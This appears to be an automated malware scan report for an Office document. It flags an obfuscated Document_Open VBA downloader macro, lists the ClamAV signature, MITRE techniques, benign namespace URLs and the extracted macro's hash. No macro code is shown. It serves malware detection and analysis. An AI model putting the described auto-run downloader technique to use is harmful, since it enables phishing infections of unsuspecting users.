Verdict: MALICIOUS
Risk Score: 122

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The ClamAV heuristic identifies it as a downloader, suggesting it fetches and executes additional malware. The VBA code is heavily obfuscated, making it difficult to determine the exact payload or destination, hence the unknown family and slightly reduced confidence.
Heuristics (4)

- ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11934 bytes |

SHA-256 of macros.bas: 159e8d1ca5182ac03b47d42778e9eb41b4766d31f0650351c2d65aca8e3654fb
Script preview: first 1,000 lines of the extracted script (the obfuscated VBA source is truncated in this copy of the report).